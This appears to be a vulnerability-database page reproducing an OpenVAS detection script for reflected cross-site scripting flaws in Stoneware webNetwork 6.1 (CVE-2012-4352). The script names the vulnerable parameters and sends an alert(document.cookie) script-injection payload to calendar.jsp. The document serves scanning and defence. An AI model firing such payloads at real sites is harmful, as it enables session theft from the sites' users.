| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
| CVE-2012-4352 | 18 Feb 201311:00 | – | cve | |
| CVE-2012-4352 | 18 Feb 201311:00 | – | cvelist | |
| EUVD-2012-4295 | 7 Oct 202500:30 | – | euvd | |
| Joomla! 2.5.x < 2.5.7 Multiple XSS | 3 Feb 201300:00 | – | nessus | |
| CVE-2012-4352 | 18 Feb 201311:56 | – | nvd | |
| Stoneware webNetwork Multiple Cross-Site Scripting Vulnerabilities | 6 Mar 201300:00 | – | openvas | |
| Cross site scripting | 18 Feb 201311:56 | – | prion | |
| CVE-2012-4352 | 22 May 202502:13 | – | redhatcve | |
| Symantec Encryption Desktop Local Access Elevation of Privilege | 13 Feb 201308:00 | – | symantec |
###############################################################################
# OpenVAS Vulnerability Test
# $Id: gb_stoneware_webnetwork_mult_xss_vuln.nasl 7254 2017-09-25 15:54:28Z cfischer $
#
# Stoneware webNetwork Multiple Cross-Site Scripting Vulnerabilities
#
# Authors:
# Arun Kallavi <[email protected]>
#
# Copyright:
# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
tag_impact = "Successful exploitation will allow attacker to execute arbitrary HTML or
web script in a user's browser session in context of an affected site.
Impact Level: Application";
tag_affected = "Stoneware WebNetwork 6.1 before SP1";
tag_insight = "Multiple flaws exists because application does the validate,
- 'blogName' parameter passed to blog.jsp and blogSearch.jsp
- 'calendarType' and 'monthNumber' parameters passed to calendar.jsp
- 'flag' parameter passed to swDashboard/ajax/setAppFlag.jsp";
tag_solution = "Upgrade to Stoneware webNetwork 6.1 SP1 or later,
For updates refer to http://www.stone-ware.com/webnetwork";
tag_summary = "This host is installed with Stoneware webNetwork and is prone to
multiple cross-site scripting vulnerabilities.";
if(description)
{
script_id(803326);
script_version("$Revision: 7254 $");
script_cve_id("CVE-2012-4352");
script_tag(name:"cvss_base", value:"4.3");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:N/I:P/A:N");
script_tag(name:"last_modification", value:"$Date: 2017-09-25 17:54:28 +0200 (Mon, 25 Sep 2017) $");
script_tag(name:"creation_date", value:"2013-03-06 11:46:39 +0530 (Wed, 06 Mar 2013)");
script_name("Stoneware webNetwork Multiple Cross-Site Scripting Vulnerabilities");
script_xref(name : "URL" , value : "http://stoneware-docs.s3.amazonaws.com/Bulletins/Security%20Bulletin%206_1_0.pdf");
script_xref(name : "URL" , value : "http://infosec42.blogspot.in/2012/10/stoneware-webnetwork-61-reflective-xss.html");
script_category(ACT_ATTACK);
script_tag(name:"qod_type", value:"remote_vul");
script_copyright("Copyright (c) 2013 Greenbone Networks GmbH");
script_family("Web application abuses");
script_require_ports("Services/www", 80);
script_dependencies("find_service.nasl", "http_version.nasl");
script_exclude_keys("Settings/disable_cgi_scanning");
script_tag(name : "impact" , value : tag_impact);
script_tag(name : "affected" , value : tag_affected);
script_tag(name : "insight" , value : tag_insight);
script_tag(name : "solution" , value : tag_solution);
script_tag(name : "summary" , value : tag_summary);
exit(0);
}
include("http_func.inc");
include("http_keepalive.inc");
## Variable Initialization
port = "";
req = "";
res = "";
url = "";
port = get_http_port(default:80);
res = http_get_cache(item:"/", port:port);
##Confirm the application
if('>Stoneware' >< res)
{
## Construct Attack Request
url = '/community/calendar.jsp?calendarType=>'+
'<script>alert(document.cookie)</script>';
## Check the response to confirm vulnerability
if(http_vuln_check(port: port, url: url, check_header: TRUE,
pattern: "<script>alert\(document\.cookie\)</script>",
extra_check: "Stoneware"))
{
security_message(port);
exit(0);
}
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation